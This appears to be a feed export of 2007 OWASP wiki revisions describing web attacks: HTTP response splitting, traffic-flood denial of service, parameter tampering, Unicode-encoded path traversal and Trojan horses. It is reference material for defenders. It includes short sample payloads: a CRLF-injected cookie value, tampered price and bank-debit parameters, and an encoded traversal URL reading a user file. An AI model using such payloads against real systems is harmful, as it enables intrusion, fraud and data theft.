&lt;div&gt;{{Template:Attack}}&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
&lt;br /&gt;
HTTP response splitting vulnerabilities occur when:&lt;br /&gt;
&lt;br /&gt;
* Data enters a web application through an untrusted source, most frequently an HTTP request. &lt;br /&gt;
* The data is included in an HTTP response header sent to a web user without being validated for malicious characters. &lt;br /&gt;
&lt;br /&gt;
As with many software security vulnerabilities, HTTP response splitting is a means to an end, not an end in itself. At its root, the vulnerability is straightforward: an attacker passes malicious data to a vulnerable application, and the application includes the data in an HTTP response header.&lt;br /&gt;
&lt;br /&gt;
To mount a successful exploit, the application must allow input that contains CR (carriage return, also given by %0d or \r) and LF (line feed, also given by %0a or \n)characters into the header. These characters not only give attackers control of the remaining headers and body of the response the application intends to send, but also allows them to create additional responses entirely under their control.&lt;br /&gt;
&lt;br /&gt;
== Severity ==&lt;br /&gt;
&lt;br /&gt;
High &lt;br /&gt;
&lt;br /&gt;
== Likelihood of exploitation ==&lt;br /&gt;
&lt;br /&gt;
Medium&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Examples ==&lt;br /&gt;
&lt;br /&gt;
The following code segment reads the name of the author of a weblog entry, author, from an HTTP request and sets it in a cookie header of an HTTP response.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
	String author = request.getParameter(AUTHOR_PARAM);&lt;br /&gt;
	...&lt;br /&gt;
	Cookie cookie = new Cookie(&amp;quot;author&amp;quot;, author);&lt;br /&gt;
        cookie.setMaxAge(cookieExpiration);&lt;br /&gt;
        response.addCookie(cookie);&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Assuming a string consisting of standard alpha-numeric characters, such as &amp;quot;Jane Smith&amp;quot;, is submitted in the request the HTTP response including this cookie might take the following form:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
	HTTP/1.1 200 OK&lt;br /&gt;
	...&lt;br /&gt;
	Set-Cookie: author=Jane Smith&lt;br /&gt;
	...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, because the value of the cookie is formed of unvalidated user input the response will only maintain this form if the value submitted for AUTHOR_PARAM does not contain any CR and LF characters. If an attacker submits a malicious string, such as &amp;quot;Wiley Hacker\r\nHTTP/1.1 200 OK\r\n...&amp;quot;, then the HTTP response would be split into two responses of the following form:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
	HTTP/1.1 200 OK&lt;br /&gt;
	...&lt;br /&gt;
	Set-Cookie: author=Wiley Hacker&lt;br /&gt;
	&lt;br /&gt;
	HTTP/1.1 200 OK&lt;br /&gt;
	...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Clearly, the second response is completely controlled by the attacker and can be constructed with any header and body content desired. The ability of attacker to construct arbitrary HTTP responses permits a variety of resulting attacks, including: cross-user defacement, web and browser cache poisoning, cross-site scripting and page hijacking.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Severity ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Likelihood of exploit ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==External References==&lt;br /&gt;
&lt;br /&gt;
http://www.infosecwriters.com/text_resources/pdf/HTTP_Response.pdf - HTTP Response Spliting&lt;br /&gt;
&lt;br /&gt;
http://www.securiteam.com/securityreviews/5WP0E2KFGK.html - Introdution to HTTP Response Spliting&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related Threats==&lt;br /&gt;
&lt;br /&gt;
[[Client-side attacks]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related Attacks==&lt;br /&gt;
&lt;br /&gt;
*[[Cross-User Defacement]]&lt;br /&gt;
*[[Cache Poisoning]]&lt;br /&gt;
*[[Cross-Site Scripting]]&lt;br /&gt;
*[[Page Hijacking]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related Vulnerabilities==&lt;br /&gt;
&lt;br /&gt;
[[:Category:Input Validation Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related Countermeasures==&lt;br /&gt;
&lt;br /&gt;
[[:Category:Input Validation]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Credit==&lt;br /&gt;
&lt;br /&gt;
{{Template:Fortify}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category: Protocol Manipulation]]&lt;br /&gt;
&lt;br /&gt;
[[Category: Attack]]&lt;/div&gt;</summary>
		<author><name>Nsrav</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=HTTP_Response_Splitting&amp;diff=23111</id>
		<title>HTTP Response Splitting</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=HTTP_Response_Splitting&amp;diff=23111"/>
				<updated>2007-11-05T18:44:58Z</updated>
		
		<summary type="html">&lt;p&gt;Nsrav: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:Attack}}&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
&lt;br /&gt;
HTTP response splitting vulnerabilities occur when:&lt;br /&gt;
&lt;br /&gt;
* Data enters a web application through an untrusted source, most frequently an HTTP request. &lt;br /&gt;
* The data is included in an HTTP response header sent to a web user without being validated for malicious characters. &lt;br /&gt;
&lt;br /&gt;
As with many software security vulnerabilities, HTTP response splitting is a means to an end, not an end in itself. At its root, the vulnerability is straightforward: an attacker passes malicious data to a vulnerable application, and the application includes the data in an HTTP response header.&lt;br /&gt;
&lt;br /&gt;
To mount a successful exploit, the application must allow input that contains CR (carriage return, also given by %0d or \r) and LF (line feed, also given by %0a or \n)characters into the header. These characters not only give attackers control of the remaining headers and body of the response the application intends to send, but also allows them to create additional responses entirely under their control.&lt;br /&gt;
&lt;br /&gt;
== Severity ==&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
== Likelihood of exploitation ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Examples ==&lt;br /&gt;
&lt;br /&gt;
The following code segment reads the name of the author of a weblog entry, author, from an HTTP request and sets it in a cookie header of an HTTP response.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
	String author = request.getParameter(AUTHOR_PARAM);&lt;br /&gt;
	...&lt;br /&gt;
	Cookie cookie = new Cookie(&amp;quot;author&amp;quot;, author);&lt;br /&gt;
        cookie.setMaxAge(cookieExpiration);&lt;br /&gt;
        response.addCookie(cookie);&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Assuming a string consisting of standard alpha-numeric characters, such as &amp;quot;Jane Smith&amp;quot;, is submitted in the request the HTTP response including this cookie might take the following form:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
	HTTP/1.1 200 OK&lt;br /&gt;
	...&lt;br /&gt;
	Set-Cookie: author=Jane Smith&lt;br /&gt;
	...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, because the value of the cookie is formed of unvalidated user input the response will only maintain this form if the value submitted for AUTHOR_PARAM does not contain any CR and LF characters. If an attacker submits a malicious string, such as &amp;quot;Wiley Hacker\r\nHTTP/1.1 200 OK\r\n...&amp;quot;, then the HTTP response would be split into two responses of the following form:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
	HTTP/1.1 200 OK&lt;br /&gt;
	...&lt;br /&gt;
	Set-Cookie: author=Wiley Hacker&lt;br /&gt;
	&lt;br /&gt;
	HTTP/1.1 200 OK&lt;br /&gt;
	...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Clearly, the second response is completely controlled by the attacker and can be constructed with any header and body content desired. The ability of attacker to construct arbitrary HTTP responses permits a variety of resulting attacks, including: cross-user defacement, web and browser cache poisoning, cross-site scripting and page hijacking.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Severity ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Likelihood of exploit ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==External References==&lt;br /&gt;
&lt;br /&gt;
http://www.infosecwriters.com/text_resources/pdf/HTTP_Response.pdf - HTTP Response Spliting&lt;br /&gt;
&lt;br /&gt;
http://www.securiteam.com/securityreviews/5WP0E2KFGK.html - Introdution to HTTP Response Spliting&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related Threats==&lt;br /&gt;
&lt;br /&gt;
[[Client-side attacks]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related Attacks==&lt;br /&gt;
&lt;br /&gt;
*[[Cross-User Defacement]]&lt;br /&gt;
*[[Cache Poisoning]]&lt;br /&gt;
*[[Cross-Site Scripting]]&lt;br /&gt;
*[[Page Hijacking]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related Vulnerabilities==&lt;br /&gt;
&lt;br /&gt;
[[:Category:Input Validation Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related Countermeasures==&lt;br /&gt;
&lt;br /&gt;
[[:Category:Input Validation]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Credit==&lt;br /&gt;
&lt;br /&gt;
{{Template:Fortify}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category: Protocol Manipulation]]&lt;br /&gt;
&lt;br /&gt;
[[Category: Attack]]&lt;/div&gt;</summary>
		<author><name>Nsrav</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Traffic_flood&amp;diff=23109</id>
		<title>Traffic flood</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Traffic_flood&amp;diff=23109"/>
				<updated>2007-11-05T18:34:26Z</updated>
		
		<summary type="html">&lt;p&gt;Nsrav: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:attack}}&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
&lt;br /&gt;
Traffic Flood is a type of DoS attack targeting web servers, the attack explores the way that TCP connection is managed. The attack consists in a generation of a lot of well crafted TCP requisitions  with the objective to stop the Web Server or causing a performance decrease.&lt;br /&gt;
&lt;br /&gt;
The attack explores the characteristic of the HTTP protocol, opening many connections at the same time to attend a single requisition.  This special feature of the http protocol, which consists in to open a TCP connection for every html object and close it, could be used to make two different kinds of exploitation. &lt;br /&gt;
The Connect attack is done during the establishment of the connection, and the Closing attack is done during the connection closing.&lt;br /&gt;
&lt;br /&gt;
== Severity ==&lt;br /&gt;
&lt;br /&gt;
High&lt;br /&gt;
&lt;br /&gt;
== Likelihood of exploitation ==&lt;br /&gt;
&lt;br /&gt;
Very High&lt;br /&gt;
&lt;br /&gt;
==Examples==&lt;br /&gt;
&lt;br /&gt;
===Connect attack===&lt;br /&gt;
&lt;br /&gt;
This type of attack consists in establishing a big number of fake TCP connections with an incomplete HTTP request until the web server is overwhelmed of connections and stops responding.&lt;br /&gt;
&lt;br /&gt;
The aim of the incomplete HTTP request is to keep the web server, with the TCP connection in Established state, waiting for the completion of the request, as shown in figure1. Depending on the implementation of the web server the connection stays in this state until there is a  timeout of the TCP connection or of the web server. This way it’s possible to establish a great number of new connections before the first ones begin to timeout moreover the generation rate of new connections grows faster than the expiring one.  &lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
https://www.owasp.org/images/b/b4/Trafficatual.jpg&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
The attack could also affect firewall that implements a proxy like access control as Checkpoint FW1.&lt;br /&gt;
&lt;br /&gt;
===Closing Attack===&lt;br /&gt;
&lt;br /&gt;
The Closing Attack is done during the ending steps of a TCP connection exploring how some web servers deal with the finalization of the TCP connection especially with the FIN_WAIT_1 state.&lt;br /&gt;
The attack as explained by Stanislav Shalunov: “ comes in two flavors: mbufs exhaustion and process saturation.&lt;br /&gt;
&lt;br /&gt;
When doing mbufs exhaustion, one wants the user-level process on the other end to write the data without blocking and close the descriptor. Kernel will have to deal with all the data, and the user-level process will be free, so that more requests can be sent this way and eventually consume all the mbufs or all physical memory, if mbufs are allocated dynamically.&lt;br /&gt;
&lt;br /&gt;
When doing process saturation, one wants user-level process to block while trying to write data. The architecture of many HTTP servers will allow serving only a number of connections at a time. When this number of connections  is reached the server will stop responding to legitimate users. If the server doesn't put a bound on the number of connections,resources will still be tied up and eventually the machine comes to a crawling halt.&lt;br /&gt;
&lt;br /&gt;
== External References==&lt;br /&gt;
&lt;br /&gt;
* http://shlang.com/netkill/netkill.html&lt;br /&gt;
&lt;br /&gt;
==Related Threats==&lt;br /&gt;
&lt;br /&gt;
[[:Category:Logical Attacks]]&lt;br /&gt;
&lt;br /&gt;
==Related Attacks==&lt;br /&gt;
&lt;br /&gt;
*[[Denial of Service]]&lt;br /&gt;
&lt;br /&gt;
==Related Vulnerabilities==&lt;br /&gt;
&lt;br /&gt;
[[:Category:General Logic Error Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
==Related Countermeasures==&lt;br /&gt;
&lt;br /&gt;
[[:Category:Denial of Service Attack]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:Protocol Manipulation]]&lt;br /&gt;
&lt;br /&gt;
[[Category:Attack]]&lt;/div&gt;</summary>
		<author><name>Nsrav</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:Trafficatual.jpg&amp;diff=23105</id>
		<title>File:Trafficatual.jpg</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:Trafficatual.jpg&amp;diff=23105"/>
				<updated>2007-11-05T18:20:52Z</updated>
		
		<summary type="html">&lt;p&gt;Nsrav: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Nsrav</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Web_Parameter_Tampering&amp;diff=23104</id>
		<title>Web Parameter Tampering</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Web_Parameter_Tampering&amp;diff=23104"/>
				<updated>2007-11-05T18:14:32Z</updated>
		
		<summary type="html">&lt;p&gt;Nsrav: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:Attack}}&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
&lt;br /&gt;
Web Parameter Tampering attack is based on manipulation of parameters exchanged between client and server in order to modify application data such as user credentials and permissions, price and quantity of products, etc. Usually, this information is stored in cookies, hidden form fields and URL Query Strings and is used to increase application functionality and control.&lt;br /&gt;
&lt;br /&gt;
This attack can be performed in the context of a malicious user who wants exploit the application for its own behalf or an attacker who whishes to attack a third-person using Man in the Middle attack. In both cases, tools likes Webscarab and Parosproxy are mostly used.&lt;br /&gt;
&lt;br /&gt;
The attack success depends on integrity and logic validation mechanisms errors and its exploitation can result on others consequences including XSS, SQL Injection, file inclusion and path disclosure attacks.&lt;br /&gt;
&lt;br /&gt;
== Severity ==&lt;br /&gt;
&lt;br /&gt;
High &lt;br /&gt;
&lt;br /&gt;
== Likelihood of exploitation ==&lt;br /&gt;
&lt;br /&gt;
Very High&lt;br /&gt;
&lt;br /&gt;
==Examples ==&lt;br /&gt;
&lt;br /&gt;
=== Example 1===&lt;br /&gt;
&lt;br /&gt;
The parameter modification of form fields can be considered a typical example of Web Parameter Tampering attack. &lt;br /&gt;
&lt;br /&gt;
For example, consider a user can select form fields values (combo box, check box, etc.) on an application page. When these values are submitted by user, they could be acquired and arbitrarily manipulated by an attacker.&lt;br /&gt;
&lt;br /&gt;
=== Example 2===&lt;br /&gt;
&lt;br /&gt;
When a web application uses hidden fields to store status information, a malicious user can tamper the values stored on his browser and change the referred information. For example, an e-commerce shopping site uses hidden fields to refer its items, as follows:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;input type=”hidden” id=”1008” name=”cost” value=”70.00”&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In this example, an attacker can modify the “value” information of a specific item, thus lowering its costs.&lt;br /&gt;
&lt;br /&gt;
=== Example 3===&lt;br /&gt;
&lt;br /&gt;
An attacker can tamper URL parameters directly. For example, consider a web application that permits user to select his profile from a combo box and debit the account:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;http://www.attackbank.com/default.asp?profile=741&amp;amp;debit=1000&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In this case, an attacker could tamper that URL using other values for profile and debit:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;http://www.attackbank.com/default.asp?profile=852&amp;amp;debit=2000&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Other parameters can be changed including attribute parameters. In the following example, it’s possible to tamper status variable and delete a page from the server:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;http://www.attackbank.com/savepage.asp?nr=147&amp;amp;status=read&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Modifying status variable to delete the page:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;http://www.attackbank.com/savepage.asp?nr=147&amp;amp;status=del&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==External References==&lt;br /&gt;
&lt;br /&gt;
http://cwe.mitre.org/data/definitions/472.html - Web Parameter Tampering&lt;br /&gt;
&lt;br /&gt;
http://www.imperva.com/application_defense_center/glossary/parameter_tampering.html - Parameter Tampering Imperva - Application Defense Center&lt;br /&gt;
&lt;br /&gt;
http://www.cgisecurity.com/owasp/html/ch11s04.html - Parameter Manipulation - Chapter 11.  Preventing Common Problems&lt;br /&gt;
&lt;br /&gt;
==Related Threats==&lt;br /&gt;
&lt;br /&gt;
[[:Category:Client-side Attacks]]&lt;br /&gt;
&lt;br /&gt;
[[:Category:Logical Attacks]]&lt;br /&gt;
&lt;br /&gt;
==Related Attacks==&lt;br /&gt;
&lt;br /&gt;
*[[SQL Injection]]&lt;br /&gt;
&lt;br /&gt;
*[[XSS Attacks]]&lt;br /&gt;
&lt;br /&gt;
*[[Path Traversal]]&lt;br /&gt;
&lt;br /&gt;
==Related Vulnerabilities==&lt;br /&gt;
&lt;br /&gt;
[[:Category: Input Validation Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
==Related Countermeasures==&lt;br /&gt;
&lt;br /&gt;
[[:Category: Input Validation Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category: Injection]]&lt;br /&gt;
&lt;br /&gt;
[[Category: Attack]]&lt;/div&gt;</summary>
		<author><name>Nsrav</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Unicode_Encoding&amp;diff=23094</id>
		<title>Unicode Encoding</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Unicode_Encoding&amp;diff=23094"/>
				<updated>2007-11-05T17:57:35Z</updated>
		
		<summary type="html">&lt;p&gt;Nsrav: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:Attack}}&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
&lt;br /&gt;
The attack aims to explore flaws in the decode mechanism implemented on applications when decoding Unicode data format. An attacker can use this technique to encode certain characters in the URL to bypass application filters, thus accessing restricted resources on the Web server or force browsing to protected pages.&lt;br /&gt;
&lt;br /&gt;
== Severity ==&lt;br /&gt;
&lt;br /&gt;
High&lt;br /&gt;
&lt;br /&gt;
== Likelihood of exploitation ==&lt;br /&gt;
&lt;br /&gt;
High&lt;br /&gt;
&lt;br /&gt;
==Examples ==&lt;br /&gt;
&lt;br /&gt;
Consider a web application that has restricted directories or files (e.g. a file containing application usernames: appusers.txt). An attacker can encode the character sequence “../” (Path Traversal Attack) using Unicode format and attempt to access the protected resource, as follows:&lt;br /&gt;
&lt;br /&gt;
Original Path Traversal attack URL (without Unicode Encoding):&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;http://vulneapplication/../../appusers.txt&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Path Traversal attack URL with Unicode Encoding:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;http://vulneapplication/%C0AE/%C0AE%C0AF%C0AE%C0AE%C0AFappusers.txt&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The Unicode encoding for the URL above will produce the same result as the first URL (Path Traversal Attack). However, if the application has certain input security filter mechanism, it could refuse any request containing “../” sequence, thus blocking the attack. However, if this mechanism doesn’t consider character encoding, the attacker can bypass and access protected resource.&lt;br /&gt;
&lt;br /&gt;
Other consequences of this type of attack are privilege escalation, arbitrary code execution, data modification and denial of service.&lt;br /&gt;
&lt;br /&gt;
==External References ==&lt;br /&gt;
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0884 - CVE-2000-0884&lt;br /&gt;
&lt;br /&gt;
http://capec.mitre.org/data/definitions/71.html - Using Unicode Encoding to Bypass Validation Logic&lt;br /&gt;
&lt;br /&gt;
http://www.microsoft.com/technet/security/bulletin/MS00-078.mspx - Patch Available for 'Web Server Folder Traversal' Vulnerability&lt;br /&gt;
&lt;br /&gt;
http://www.kb.cert.org/vuls/id/739224 - HTTP content scanning systems full-width/half-width Unicode encoding bypass&lt;br /&gt;
&lt;br /&gt;
http://scissec.scis.ecu.edu.au/conferences2007/documents/cheong_kai_wai_1.pdf - Penetration testing of cross site scripting and SQL injection on web application by Cheong Kai Wee &lt;br /&gt;
&lt;br /&gt;
http://www.cgisecurity.com/lib/URLEmbeddedAttacks.html - URL encoded attacks, by Gunter Ollmann &lt;br /&gt;
&lt;br /&gt;
==Related Threats==&lt;br /&gt;
&lt;br /&gt;
[[:Category:Command Execution]]&lt;br /&gt;
&lt;br /&gt;
[[:Category:Information Disclosure]]&lt;br /&gt;
&lt;br /&gt;
==Related Attacks==&lt;br /&gt;
&lt;br /&gt;
*[[Path Traversal]]&lt;br /&gt;
*[[Embedding Null Code]]&lt;br /&gt;
&lt;br /&gt;
==Related Vulnerabilities==&lt;br /&gt;
&lt;br /&gt;
[[:Category:Input Validation]]&lt;br /&gt;
&lt;br /&gt;
==Related Countermeasures==&lt;br /&gt;
&lt;br /&gt;
[[:Category:Input Validation]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:Resource Manipulation]]&lt;br /&gt;
&lt;br /&gt;
[[Category:Attack]]&lt;/div&gt;</summary>
		<author><name>Nsrav</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Trojan_Horse&amp;diff=23093</id>
		<title>Trojan Horse</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Trojan_Horse&amp;diff=23093"/>
				<updated>2007-11-05T17:53:38Z</updated>
		
		<summary type="html">&lt;p&gt;Nsrav: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:Attack}}&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
&lt;br /&gt;
A Trojan horse is a program that uses malicious code masqueraded as a benign application. The term derives from the myth of the Greek Trojan Horse on the Trojan War. The malicious code can be injected on legitimate software to be installed by victim, or the supposed benign program itself can be the Trojan horse. The victim is usually tricked to open the Trojan horse because it appears to be received from a legitimate source.&lt;br /&gt;
This kind of malware looks and acts like a virus, but the difference resides on the fact that Trojan horse does not self-replicate. The infected computer experience many different symptoms similar to virus, as background configuration auto changing, mouse buttons function reversing, system crashes, the famous blue screen, computer reboots itself, Ctrl + Alt + Del stops working, and many other symptoms described later in this document.&lt;br /&gt;
The ultimate Trojan horse uses javascript to make furtive attack, free of antimalware intervention and users interception, normally used on attacks against internet banking transactions on-the-fly, resulting victim´s financial loss. &lt;br /&gt;
&lt;br /&gt;
Other details can be found on [[Man-in-the-browser attack]].&lt;br /&gt;
&lt;br /&gt;
'''The 7 main types of Trojan Horse'''&lt;br /&gt;
&lt;br /&gt;
1.Remote Access Trojan (RAT)&lt;br /&gt;
&lt;br /&gt;
Designed to provide the attacker full control of the infected machine. Trojan horse usually masqueraded as a utility. &lt;br /&gt;
&lt;br /&gt;
2.Data Sending Trojan&lt;br /&gt;
&lt;br /&gt;
Trojan horse that uses keylogger technology to capture sensitive data like passwords, credit card and banking information, IM messages, and send back to attacker.&lt;br /&gt;
&lt;br /&gt;
3.Destructive Trojan&lt;br /&gt;
&lt;br /&gt;
Trojan horse designed to destroy data stored on victim’s computer.&lt;br /&gt;
&lt;br /&gt;
4.Proxy Trojan&lt;br /&gt;
&lt;br /&gt;
Trojan horse that uses the victim´s computer as a proxy server, providing attacker opportunity to execute illicit acts from the infected computer, like banking fraud, and even malicious attacks over the internet.&lt;br /&gt;
&lt;br /&gt;
5.FTP Trojan&lt;br /&gt;
&lt;br /&gt;
This type of Trojan horse uses the port 21 to enable the attackers to connect to the victim´s computer using File Transfer Protocol.&lt;br /&gt;
&lt;br /&gt;
6.Security software disabler Trojan&lt;br /&gt;
&lt;br /&gt;
The Trojan horse is designed to disable security software like firewall and antivirus, enabling the attacker to use many invasion techniques to invade the victim´s computer, and even to infect more the computer.&lt;br /&gt;
&lt;br /&gt;
7.Denial-of-Service attack Trojan&lt;br /&gt;
&lt;br /&gt;
Trojan horse designed to give the attacker opportunity to realize Denial-of-Service attacks from victim´s computer.&lt;br /&gt;
&lt;br /&gt;
'''Symptoms'''&lt;br /&gt;
&lt;br /&gt;
A list of common symptoms is described in this section.&lt;br /&gt;
&lt;br /&gt;
•Wallpaper and other background settings auto changing&lt;br /&gt;
&lt;br /&gt;
•Internet browser display unknown web sites&lt;br /&gt;
&lt;br /&gt;
•Mouse pointer disappear&lt;br /&gt;
&lt;br /&gt;
•Sound volume auto changing&lt;br /&gt;
&lt;br /&gt;
•Buttons, shortcuts and other basic resources disappear&lt;br /&gt;
&lt;br /&gt;
•Programs auto loading and unloading&lt;br /&gt;
&lt;br /&gt;
•Strange windows warnings, messages and question box, and options being displayed constantly&lt;br /&gt;
&lt;br /&gt;
•e-mail client auto sending messages to all user´s contacts list&lt;br /&gt;
&lt;br /&gt;
•Windows auto closing&lt;br /&gt;
&lt;br /&gt;
•System auto rebooting&lt;br /&gt;
&lt;br /&gt;
•Internet accounts information changing&lt;br /&gt;
&lt;br /&gt;
•High internet bandwidth being used without user action&lt;br /&gt;
&lt;br /&gt;
•Computer´s high resources consumption (computer slows down)&lt;br /&gt;
&lt;br /&gt;
•Popup with adult content or illegal references appearing without user action&lt;br /&gt;
&lt;br /&gt;
•Ctrl + Alt + Del stops working&lt;br /&gt;
&lt;br /&gt;
•Other users connected to the computer&lt;br /&gt;
&lt;br /&gt;
•Documents being sent to the printer without user action&lt;br /&gt;
&lt;br /&gt;
•DVD/CD drive´s drawer auto opening and closing&lt;br /&gt;
&lt;br /&gt;
== Severity ==&lt;br /&gt;
&lt;br /&gt;
High&lt;br /&gt;
&lt;br /&gt;
== Likelihood of exploitation ==&lt;br /&gt;
&lt;br /&gt;
Medium to High&lt;br /&gt;
&lt;br /&gt;
==Examples==&lt;br /&gt;
&lt;br /&gt;
A Javascript Trojan Horse example can be found on: http://www.attacklabs.com/download/sniffer.rar .&lt;br /&gt;
&lt;br /&gt;
An iframe pointing to a javascript which downloads malware: http://isc.sans.org/diary.html?storyid=2923&amp;amp;dshield=4c501ba0d99f5168ce114d3a3feab567&lt;br /&gt;
&lt;br /&gt;
== External References==&lt;br /&gt;
&lt;br /&gt;
*[[http://myappsecurity.blogspot.com/2007/01/ajax-sniffer-prrof-of-concept.html | Ajax Sniffer]]&lt;br /&gt;
&lt;br /&gt;
*[[http://hacker-eliminator.com/trojansymptoms.html | Trojan Infection Symptoms]]&lt;br /&gt;
&lt;br /&gt;
*[[http://www.webopedia.com/DidYouKnow/Internet/2004/virus.asp | The Difference Between a Virus, Worm and Trojan Horse]]&lt;br /&gt;
&lt;br /&gt;
==Related Threats==&lt;br /&gt;
&lt;br /&gt;
*[[:Category:Client-side Attacks]]&lt;br /&gt;
&lt;br /&gt;
==Related Attacks==&lt;br /&gt;
&lt;br /&gt;
* [[Spyware]]&lt;br /&gt;
* [[Phishing]]&lt;br /&gt;
&lt;br /&gt;
==Related Vulnerabilities==&lt;br /&gt;
&lt;br /&gt;
TBD&lt;br /&gt;
&lt;br /&gt;
==Related Countermeasures==&lt;br /&gt;
&lt;br /&gt;
TBD&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:Malicious Code Attack]]&lt;br /&gt;
&lt;br /&gt;
[[Category:Attack]]&lt;/div&gt;</summary>
		<author><name>Nsrav</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Spyware&amp;diff=23090</id>
		<title>Spyware</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Spyware&amp;diff=23090"/>
				<updated>2007-11-05T17:47:00Z</updated>
		
		<summary type="html">&lt;p&gt;Nsrav: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:Attack}}&lt;br /&gt;
